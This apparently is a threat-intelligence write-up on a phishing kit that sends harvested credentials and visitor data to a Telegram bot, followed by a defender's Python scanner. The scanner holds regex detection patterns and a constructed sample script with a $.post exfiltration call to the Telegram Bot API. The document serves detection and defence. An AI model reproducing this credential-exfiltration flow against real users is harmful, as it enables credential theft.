Threat Actors Using Telegram APIs To Steal Login Credentials


Threat actors are exploiting Telegram APIs to avoid detection and illicitly obtain users’ login credentials.

Be cautious of a phishing email containing a disguised URL (hxxps[://]www[.]astunet[.]com/wp-plug/imu0nni5/3rhenqt2/) that directs you to a deceptive landing page hosted on r2.dev cloud storage (hxxps[://]pub-31a116fb226d4dfaa2004eef764a6bff[.]r2[.]dev/ayo[.]html). Stay alert and do not click on any suspicious links.


This landing page uses a JavaScript script with jQuery to handle form submissions. When a user fills out the form, the script sends a POST request containing the target’s credentials and other information, likely to a Telegram bot for further exploitation. 

Phishing Landing Page

The code snippets implement a malicious function that exfiltrates sensitive visitor data by constructing a detailed message from the collected information and transmitting it to a designated Telegram chat through the Telegram Bot API.


By covertly collecting victim information and forwarding it to the threat actors, this functionality is designed to make phishing campaigns easier to run.

Code Snippet is responsible for logging visitor information to a Telegram chat

The script executes upon full document load, initializing a counter variable to monitor its executions, and then extracts a Base64-encoded hash fragment from the URL, which is subsequently decoded and stored within the ‘ai’ variable. 

If the ‘ai’ variable contains a value, the script parses an email address from it, extracts the domain name, and then uses that domain name to fetch and display a corresponding logo.

The script employs Telegram bot communication, utilizing separate tokens (BOT_TOKEN, LOGGER_TOKEN) for a primary bot and a potential logging bot and incorporating corresponding chat IDs (CHAT_ID, LOGGER_ID) to determine the message recipients for the bots.

Code Snippet defines key variables

The form submission handler intercepts the default form submission behavior upon clicking the “submit-btn” button. It validates email format and password length, preventing submission if criteria aren’t met. 

For valid inputs, it asynchronously sends visitor data, email, password, browser details, and MX record to a Telegram bot via AJAX.

Based on the bot’s response, the handler either displays an error message or simulates a successful login by redirecting to a specified PDF, bypassing the traditional server interaction and page reload. 

The script uses helper functions to gather visitor information and potentially send it to a specific URL: `getVisitorIP` retrieves IP details, `logVisitorToTelegram` asynchronously logs data to a Telegram chat, and `getMXRecord` fetches the email server information.

The `handleBase64Data` function decodes a variable named `FILE` (likely containing a base64 encoded URL) that might be the target for sending visitor information, including IP data processed by `sendVisitorIP`. 

According to ForcePoint, the script maliciously captures user email and passwords, validates the input, and transmits stolen credentials, along with user IP and browser data, to a Telegram bot via asynchronous AJAX. 

It leverages domain logo fetching for potential social engineering and suppresses the default form submission so that its actions run without a page reload, indicating a sophisticated phishing attempt.
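For defenders triaging a suspected landing page, the behaviours described above (a hard-coded Telegram bot token and chat ID, a sendMessage call to api.telegram.org, a Base64 hash fragment carrying the target's email, and a hijacked form submit) can be turned into a small static scan. The following is an added example, not code from the article or the phishing kit; the JavaScript fragments and the bot token it scans are constructed placeholders, and the indicator names are my own.

```python
import re
import base64
import binascii
from urllib.parse import urlparse, unquote

# Indicators drawn from the behaviour the article describes. Telegram bot tokens
# have the shape <numeric bot id>:<secret>; the secret is never reported in full.
BOT_TOKEN_RE = re.compile(r"\b(\d{6,12}:[A-Za-z0-9_-]{30,})")
INDICATORS = {
    "telegram_api_host": re.compile(r"api\.telegram\.org", re.I),
    "telegram_send_message": re.compile(r"/sendMessage\b"),
    "token_or_chat_variables": re.compile(r"\b(BOT_TOKEN|LOGGER_TOKEN|CHAT_ID|LOGGER_ID)\b"),
    "hash_fragment_decoded": re.compile(r"atob\(\s*(window\.)?location\.hash"),
    "form_submit_hijack": re.compile(r"preventDefault\(\)"),
}

# Constructed sample: disjointed fragments modelled on the kit, with a fake token.
SAMPLE_SCRIPT = r"""
var BOT_TOKEN = "1234567890:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
var CHAT_ID = "0000000000";
var ai = atob(window.location.hash.substring(1));
e.preventDefault();
$.post("https://api.telegram.org/bot" + BOT_TOKEN + "/sendMessage", payload);
"""

def redact_token(token):
    """Keep the numeric bot id (useful for correlating kits) and hide the secret."""
    bot_id, _, _secret = token.partition(":")
    return bot_id + ":<redacted>"

def scan_for_telegram_exfil(script_text):
    """Return the indicators found in a page or script body; empty dict if none."""
    findings = {}
    tokens = BOT_TOKEN_RE.findall(script_text)
    if tokens:
        findings["telegram_bot_tokens"] = [redact_token(t) for t in tokens]
    for name, pattern in INDICATORS.items():
        if pattern.search(script_text):
            findings[name] = True
    return findings

def decode_target_from_url(url):
    """Decode the Base64 hash fragment (the kit's 'ai' value) to identify the
    targeted address; returns None if the fragment is missing or not an email."""
    fragment = unquote(urlparse(url).fragment)
    if not fragment:
        return None
    try:
        padded = fragment + "=" * (-len(fragment) % 4)
        decoded = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if "@" in decoded else None
```

Running `scan_for_telegram_exfil` over a captured landing page gives an indicator list suitable for a detection rule or an IR note, and `decode_target_from_url` tells you which mailbox a reported lure URL was personalised for.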



